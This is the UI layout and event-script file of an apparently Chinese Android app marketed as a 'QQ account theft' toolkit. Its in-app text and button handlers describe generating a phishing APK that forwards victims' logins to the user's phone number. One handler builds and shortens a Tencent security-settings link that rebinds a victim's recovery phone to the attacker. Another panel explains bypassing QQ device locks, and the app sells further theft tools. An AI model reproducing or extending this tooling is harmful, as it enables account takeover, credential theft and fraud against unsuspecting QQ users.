<View id="92" did="0" type="LinearLayout">
<ppt>width=-1
height=48dp
BackgroundColor=#ff00bfff
orientation=horizontal
gravity=center_vertical</ppt>
<event></event>
</View>
<View id="93" did="92" type="ImageView">
<ppt>width=56dp
height=-1
src=@lp/base_back.v
padding=14dp
backgroundripple=#e3e3e3e3</ppt>
<event><eventItme type="clicki">end()
fr("$幻隐网络/点击特效/开.txt",anyx)
f(anyx &gt; "0")
{
  bfm("$幻隐网络/配置/djyx.mp3")
}
</eventItme></event>
</View>
<View id="94" did="92" type="TextView">
<ppt>width=-2
height=-1
text=盗号功能
textcolor=#ffffffff
layout_marginright=5dp
gravity=center
textsize=16sp
typeface=normal
textstyle=bold
layout_marginleft=5dp</ppt>
<event></event>
</View>
<View id="95" did="0" type="LinearLayout">
<ppt>width=-1
height=0.2dp
orientation=vertical
background=#ffb8b8b8</ppt>
<event></event>
</View>
<View id="84" did="0" type="ScrollView">
<ppt>width=-1
height=-1
background=white</ppt>
<event></event>
</View>
<View id="1" did="84" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
background=#ffffffff</ppt>
<event></event>
</View>
<View id="2" did="1" type="LinearLayout">
<ppt>width=-1
height=190dp
background=#ffffffff
orientation=vertical</ppt>
<event></event>
</View>
<View id="3" did="2" type="LinearLayout">
<ppt>width=-1
height=150dp
background=@explore_association_bg.v
orientation=vertical</ppt>
<event></event>
</View>
<View id="4" did="2" type="LinearLayout">
<ppt>width=350dp
height=130dp
background=through
orientation=vertical
layout_margintop=-90dp
layout_marginleft=5dp
gravity=center</ppt>
<event></event>
</View>
<View id="7" did="4" type="CardView">
<ppt>width=340dp
height=120dp
app_CardcornerRadius=8dp
app_CardElevation=2dp</ppt>
<event></event>
</View>
<View id="8" did="7" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=horizontal</ppt>
<event></event>
</View>
<View id="9" did="8" type="LinearLayout">
<ppt>width=100dp
height=120dp
gravity=center
orientation=vertical</ppt>
<event></event>
</View>
<View id="10" did="9" type="LinearLayout">
<ppt>width=60dp
height=60dp
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="11" did="10" type="CardView">
<ppt>width=60dp
height=60dp
app_CardcornerRadius=99dp
app_CardElevation=0
background=$幻隐网络/记录/tx.png</ppt>
<event></event>
</View>
<View id="14" did="8" type="LinearLayout">
<ppt>width=240dp
height=120dp
orientation=vertical</ppt>
<event></event>
</View>
<View id="15" did="14" type="LinearLayout">
<ppt>width=240dp
height=120dp
orientation=vertical</ppt>
<event></event>
</View>
<View id="16" did="15" type="TextView">
<ppt>width=-2
height=-2
text=全网盗号聚合
textColor=#000000
textStyle=bold
singleLine=true
textSize=13sp
layout_margintop=15dp
layout_marginleft=9dp</ppt>
<event></event>
</View>
<View id="18" did="15" type="TextView">
<ppt>width=-2
height=-2
text=积分0.00
textColor=#ffff9e06
textStyle=bold
singleLine=true
textSize=11sp
layout_margintop=51dp
layout_marginleft=11dp</ppt>
<event><eventItme type="clicki">fr("%Android/xianzhi/yxkj.txt",a)
ss("会员积分："+a,b)
us(18,"text",b)</eventItme></event>
</View>
<View id="19" did="15" type="TextView">
<ppt>width=-2
height=-2
text=使用方法
textColor=#ff008aff
textStyle=bold
singleLine=true
textSize=11sp
layout_margintop=-14dp
layout_marginleft=170dp</ppt>
<event><eventItme type="clicki">utw(null, "盗号介绍", "您好，欢迎进入会员盗号功能！\n物如其名，这里就是盗号的天堂！所有的盗号功能这里都有！\n1.手机盗号：用法，生成软件并签名后，发送给想盗的人，最后对方登陆软件，账号即可到您的手机信息中！\n2.改保链：链接发给对方，对方成功按网站内的要求做以后，QQ的密保手机就会变成您的了！\n3.破解设备锁：破解设备锁用法就很多了，这个没法一一说，我就举个例子吧，首先登陆腾讯QQ，然后退出来，接下来搜索任何东西，只要是腾讯的网站就都不用登陆，也就达到了跳过设备锁的目的！\n\n如果您想花钱一次性付费永久使用盗号的话，也是可以的，联系客服获取软件！", "确定", false, v) 
{ 
syso("点击了确定") 
fr("$幻隐网络/点击特效/开.txt",anyx)
f(anyx &gt; "0")
{
  bfm("$幻隐网络/配置/djyx.mp3")
}

} 
</eventItme></event>
</View>
<View id="5" did="2" type="LinearLayout">
<ppt>width=-1
height=100dp
orientation=vertical</ppt>
<event></event>
</View>
<View id="20" did="1" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical</ppt>
<event></event>
</View>
<View id="21" did="20" type="LinearLayout">
<ppt>width=-1
height=125dp
orientation=horizontal
gravity=center</ppt>
<event></event>
</View>
<View id="22" did="21" type="LinearLayout">
<ppt>width=120dp
height=120dp
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="23" did="22" type="CardView">
<ppt>width=105dp
height=115dp
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="24" did="23" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">us(56,"visibility","visible")
us(62,"visibility","gone")
us(69,"visibility","gone")
us(74,"visibility","gone")
us(79,"visibility","gone")
fr("$幻隐网络/点击特效/开.txt",anyx)
f(anyx &gt; "0")
{
  bfm("$幻隐网络/配置/djyx.mp3")
}
</eventItme></event>
</View>
<View id="25" did="24" type="ImageView">
<ppt>width=-2
height=-2
src=@ec_ic_grzx_wdyhk.v</ppt>
<event></event>
</View>
<View id="26" did="24" type="TextView">
<ppt>width=-2
height=-2
text=改保链生成
textColor=#000000
textStyle=bold
textSize=10sp
layout_margintop=9dp
layout_marginleft=0dp</ppt>
<event></event>
</View>
<View id="27" did="21" type="LinearLayout">
<ppt>width=120dp
height=120dp
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="28" did="27" type="CardView">
<ppt>width=105dp
height=115dp
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="29" did="28" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">us(56,"visibility","gone")
us(62,"visibility","visible")
us(69,"visibility","gone")
us(74,"visibility","gone")
us(79,"visibility","gone")
fr("$幻隐网络/点击特效/开.txt",anyx)
f(anyx &gt; "0")
{
  bfm("$幻隐网络/配置/djyx.mp3")
}
</eventItme></event>
</View>
<View id="30" did="29" type="ImageView">
<ppt>width=-2
height=-2
src=@ec_ic_grzx_tie.v</ppt>
<event></event>
</View>
<View id="31" did="29" type="TextView">
<ppt>width=-2
height=-2
text=盗号网站
textColor=#000000
textStyle=bold
textSize=10sp
layout_margintop=9dp
layout_marginleft=0dp</ppt>
<event></event>
</View>
<View id="32" did="21" type="LinearLayout">
<ppt>width=120dp
height=120dp
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="33" did="32" type="CardView">
<ppt>width=105dp
height=115dp
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="34" did="33" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">us(56,"visibility","gone")
us(62,"visibility","gone")
us(69,"visibility","visible")
us(74,"visibility","gone")
us(79,"visibility","gone")
fr("$幻隐网络/点击特效/开.txt",anyx)
f(anyx &gt; "0")
{
  bfm("$幻隐网络/配置/djyx.mp3")
}
</eventItme></event>
</View>
<View id="35" did="34" type="ImageView">
<ppt>width=-2
height=-2
src=@ec_ic_grzx_gywm.v</ppt>
<event></event>
</View>
<View id="36" did="34" type="TextView">
<ppt>width=-2
height=-2
text=手机盗号
textColor=#000000
textStyle=bold
textSize=10sp
layout_margintop=9dp
layout_marginleft=0dp</ppt>
<event></event>
</View>
<View id="37" did="20" type="LinearLayout">
<ppt>width=-1
height=125dp
orientation=horizontal
gravity=center</ppt>
<event></event>
</View>
<View id="38" did="37" type="LinearLayout">
<ppt>width=120dp
height=120dp
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="39" did="38" type="CardView">
<ppt>width=105dp
height=115dp
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="40" did="39" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">us(56,"visibility","gone")
us(62,"visibility","gone")
us(69,"visibility","gone")
us(74,"visibility","visible")
us(79,"visibility","gone")
fr("$幻隐网络/点击特效/开.txt",anyx)
f(anyx &gt; "0")
{
  bfm("$幻隐网络/配置/djyx.mp3")
}
</eventItme></event>
</View>
<View id="41" did="40" type="ImageView">
<ppt>width=-2
height=-2
src=@ec_ic_grzx_bzfk.v</ppt>
<event></event>
</View>
<View id="42" did="40" type="TextView">
<ppt>width=-2
height=-2
text=破设备锁
textColor=#000000
textStyle=bold
textSize=10sp
layout_margintop=9dp
layout_marginleft=0dp</ppt>
<event></event>
</View>
<View id="43" did="37" type="LinearLayout">
<ppt>width=120dp
height=120dp
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="44" did="43" type="CardView">
<ppt>width=105dp
height=115dp
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="45" did="44" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">us(56,"visibility","gone")
us(62,"visibility","gone")
us(69,"visibility","gone")
us(74,"visibility","gone")
us(79,"visibility","visible")
fr("$幻隐网络/点击特效/开.txt",anyx)
f(anyx &gt; "0")
{
  bfm("$幻隐网络/配置/djyx.mp3")
}
</eventItme></event>
</View>
<View id="46" did="45" type="ImageView">
<ppt>width=-2
height=-2
src=@ec_ic_grzx_sz.v</ppt>
<event></event>
</View>
<View id="47" did="45" type="TextView">
<ppt>width=-2
height=-2
text=更多盗号
textColor=#000000
textStyle=bold
textSize=10sp
layout_margintop=9dp
layout_marginleft=0dp</ppt>
<event></event>
</View>
<View id="48" did="37" type="LinearLayout">
<ppt>width=120dp
height=120dp
orientation=vertical
gravity=center</ppt>
<event></event>
</View>
<View id="49" did="48" type="CardView">
<ppt>width=105dp
height=115dp
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="50" did="49" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event></event>
</View>
<View id="51" did="50" type="ImageView">
<ppt>width=-2
height=-2
src=@ec_ic_grzx_gywm.v
visibility=gone</ppt>
<event></event>
</View>
<View id="52" did="50" type="TextView">
<ppt>width=-2
height=-2
text=敬请期待！
textColor=#000000
textStyle=bold
textSize=10sp
layout_margintop=9dp
layout_marginleft=0dp</ppt>
<event></event>
</View>
<View id="56" did="20" type="CardView">
<ppt>width=-1
height=200dp
app_CardcornerRadius=8dp
app_CardElevation=3
visibility=gone</ppt>
<event></event>
</View>
<View id="53" did="56" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
background=#ffffffff
BackgroundRipple=#ff00afff
gravity=center
</ppt>
<event><eventItme type="clicki">endutw()</eventItme></event>
</View>
<View id="90" did="53" type="ImageView">
<ppt>width=-2
height=-2
src=@zy/ic_close_black_24dp.v
layout_gravity=right</ppt>
<event><eventItme type="clicki">us(56,"visibility","gone")</eventItme></event>
</View>
<View id="57" did="53" type="EditText">
<ppt>width=-2
height=-2
text=
hint=请输入您的手机号呀
gravity=center
background=
textCursorDrawable=#ff00bdff</ppt>
<event></event>
</View>
<View id="59" did="53" type="CardView">
<ppt>width=-2
height=-2
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="58" did="59" type="Button">
<ppt>width=-2
height=-2
text=立即修改
background=white
gravity=center</ppt>
<event><eventItme type="clicki">t()
{
ug(57,"text",sjh)
f(sjh=="")
{
  tw("请输入手机号")
}
else
{
  fn vpn.vpn()
  f(sss.vpn="有")
  {
    tw("开了")
  }
else
{
  ss("https://aq.qq.com/cn2/manage/mobile_h5/get_bind_type_new?flow_type=change&mobile_number="+sjh+"&mobile_area=86&source=1&is_mobile_forbidden=0?666666jqq?flowtype=change&is_mobile_forbidden=9#q666666fhhfddtug&jwqq666666get_bind_type_new?flow_type=change&mo",bt)    
ss("http://api.t.sina.com.cn/short_url/shorten.xml?source=3271760578&url_long="+bt,wz)
t()
{
s jq1="&lt;url_short&gt;"
s jq2="&lt;/url_short&gt;"
hs(wz, null, null,sss.ym)
sj(sss.ym,jq1,jq2,pppo)
ufnsui()
{
us(57,"text",bt)
}
}
}
}
}
}</eventItme></event>
</View>
<View id="60" did="53" type="TextView">
<ppt>width=-2
height=-2
text=想盗别人号的时候，复制已经生成的链接，发给别人即可盗别人的号了哦！
textColor=#ffcbcbcb
gravity=center</ppt>
<event></event>
</View>
<View id="61" did="53" type="TextView">
<ppt>width=-2
height=-2
text=隐心最帅
visibility=invisible</ppt>
<event></event>
</View>
<View id="62" did="20" type="CardView">
<ppt>width=-1
height=120dp
app_CardcornerRadius=8dp
app_CardElevation=3
visibility=gone</ppt>
<event></event>
</View>
<View id="63" did="62" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">endutw()</eventItme></event>
</View>
<View id="65" did="63" type="CardView">
<ppt>width=-2
height=-2
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="67" did="63" type="TextView">
<ppt>width=-2
height=-2
text=您好，盗号网站无需积分，需要联系隐心QQ购买哦！请到个人界面，点击『官方公告』获取我们的最新QQ！
textColor=#ffb4b4b4
textStyle=bold
textSize=13sp
</ppt>
<event></event>
</View>
<View id="68" did="63" type="TextView">
<ppt>width=-2
height=-2
text=隐心最帅
visibility=invisible</ppt>
<event></event>
</View>
<View id="69" did="20" type="CardView">
<ppt>width=-1
height=400dp
app_CardcornerRadius=8dp
app_CardElevation=3
visibility=gone</ppt>
<event></event>
</View>
<View id="70" did="69" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">endutw()</eventItme></event>
</View>
<View id="71" did="70" type="CardView">
<ppt>width=-2
height=-2
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="91" did="70" type="ImageView">
<ppt>width=-2
height=-2
src=@zy/ic_close_black_24dp.v
layout_gravity=right</ppt>
<event><eventItme type="clicki">us(69,"visibility","gone")</eventItme></event>
</View>
<View id="86" did="70" type="Button">
<ppt>width=180dp
height=50dp
text=选择图标
background=@tb/box_bg.v
textColor=#000000
textStyle=bold
textSize=10sp
layout_margintop=9dp
layout_marginleft=0dp
singleline=true
ellipsize=marquee
focusable=true
marqueerepeatlimit=marquee_forever
focusableintouchmode=true
scrollhorizontally=true
layout_gravity=center
</ppt>
<event><eventItme type="clicki">
javags(agc,"android.content.Intent","android.content.Intent.ACTION_GET_CONTENT")
javanew(it,"android.content.Intent","String",agc)

java(c,it,"android.content.Intent.setType","String","image/*")

javags(ca,"android.content.Intent","android.content.Intent.CATEGORY_OPENABLE")
java(c,it,"android.content.Intent.addCategory","String",ca)

java(c,activity,"android.app.Activity.startActivityForResult","android.content.Intent",it,"int",2)

</eventItme></event>
</View>
<View id="87" did="70" type="RelativeLayout">
<ppt>width=200dp
height=48dp</ppt>
<event></event>
</View>
<View id="85" did="87" type="EditText">
<ppt>width=200dp
height=48dp
text=
layout_margin=1dp
background=through
hint=输入接收信息的号码
textSize=12sp
textCursorDrawable=#ff00c0ff</ppt>
<event></event>
</View>
<View id="73" did="70" type="TextView">
<ppt>width=-2
height=-2
text=-------------------------------------------------------
singleline=true
ellipsize=marquee
focusable=true
marqueerepeatlimit=marquee_forever
focusableintouchmode=true
scrollhorizontally=true
textColor=#ff171717
layout_gravity=center
</ppt>
<event></event>
</View>
<View id="88" did="70" type="Button">
<ppt>width=190dp
height=50dp
text=立即生成
background=@tb/box_bg.v
textColor=#000000
textStyle=bold
textSize=10sp
layout_margintop=9dp
layout_marginleft=0dp</ppt>
<event><eventItme type="clicki">call(x, "mlua", "az.get","yx.yxkj")
f(x==true)
{
fn sc.l()
}
else f(x==false)
{
tw("您下载的是盗版软件")
}
</eventItme></event>
</View>
<View id="89" did="70" type="TextView">
<ppt>width=-2
height=-2
text=选择图标，填写手机号后即可生成您的专属手机盗号App！\n\n生成后发给想盗的人即可！\n\n生成的路径为：0/手机盗号『请手动签名』.apk ！\n\n软件需要手动签名！\n\n软件发给别人登陆，即可盗号！\n好了，快去开启您的盗号之旅吧
textColor=#ffb4b4b4
textStyle=bold
textSize=13sp
</ppt>
<event></event>
</View>
<View id="74" did="20" type="CardView">
<ppt>width=-1
height=600dp
app_CardcornerRadius=8dp
app_CardElevation=3
visibility=gone
layout_marginBottom=30dp</ppt>
<event></event>
</View>
<View id="75" did="74" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">endutw()</eventItme></event>
</View>
<View id="99" did="75" type="TextView">
<ppt>width=-2
height=-2
text=首先登陆腾讯QQ，接下来反回这里，搜你想进入的网页，你会发现，网页进入不需要设备锁了！
padding=8dp</ppt>
<event></event>
</View>
<View id="77" did="75" type="TextView">
<ppt>width=-2
height=-2
text=_点我登录腾讯QQ_
textColor=#ffb4b4b4
textStyle=bold
textSize=13sp
layout_marginTop=30dp
layout_gravity=center</ppt>
<event><eventItme type="clicki">uigo("dl.iyu")</eventItme></event>
</View>
<View id="97" did="75" type="CardView">
<ppt>width=-2
height=-2
app_CardcornerRadius=8dp
app_CardElevation=3
layout_gravity=center</ppt>
<event></event>
</View>
<View id="96" did="97" type="Button">
<ppt>width=-2
height=-2
text=立即破解
background=white
gravity=center</ppt>
<event><eventItme type="clicki">us(98,"visibility","visible")</eventItme></event>
</View>
<View id="98" did="75" type="WebView">
<ppt>width=-1
height=400dp
visibility=gone
url=https://m.sogou.com/?fr=s-sogou&clk=s-sogou&prs=8&rfh=1</ppt>
<event></event>
</View>
<View id="79" did="20" type="CardView">
<ppt>width=-1
height=120dp
app_CardcornerRadius=8dp
app_CardElevation=3
visibility=gone</ppt>
<event></event>
</View>
<View id="80" did="79" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=vertical
gravity=center
background=#ffffffff
BackgroundRipple=#ff00afff</ppt>
<event><eventItme type="clicki">endutw()</eventItme></event>
</View>
<View id="81" did="80" type="CardView">
<ppt>width=-2
height=-2
app_CardcornerRadius=8dp
app_CardElevation=3</ppt>
<event></event>
</View>
<View id="82" did="80" type="TextView">
<ppt>width=-2
height=-2
text=您好，有的盗号是无法生成的，所以请您联系隐心QQ获取哦！
textColor=#ffb4b4b4
textStyle=bold
textSize=13sp
</ppt>
<event></event>
</View>
<View id="83" did="80" type="TextView">
<ppt>width=-2
height=-2
text=隐心最帅
visibility=invisible</ppt>
<event></event>
</View>
<UIEventset><eventItme type="loading">uycl("#ff00bfff",true)
fr("$幻隐网络/配置/yx.txt",yg)
us(92,"background",yg)
us(3,"background",yg)
us(19,"textcolor",yg)

fr("$幻隐网络/记录/qq.txt",qq)
ss("http://qlogo2.store.qq.com/qzone/"+qq+"/"+qq+"/100",qq)
  t()
  {
call(img,"mjava","Http.getInternetPicture",qq)
syso(img)
ufnsui()
{
us(11,"background",img)
}
}


/.

</eventItme><eventItme type="loadingComplete">fr("$幻隐网络/.v/jf.yx",a)
ss("会员积分："+a,b)
us(18,"text",b)</eventItme><eventItme type="onactivityresult">javags(er,activity,"android.app.Activity","RESULT_OK")
f(st_lC==er)
{
  f(st_sC==2)
  {
    java(uri,st_iT,"android.content.Intent.getData")
    call(path, "mjava", "uri.getRealPath", activity, uri)
    syso(path)
.    us(2, "src", path)
    us(86, "text", path)
  }
}
</eventItme></UIEventset>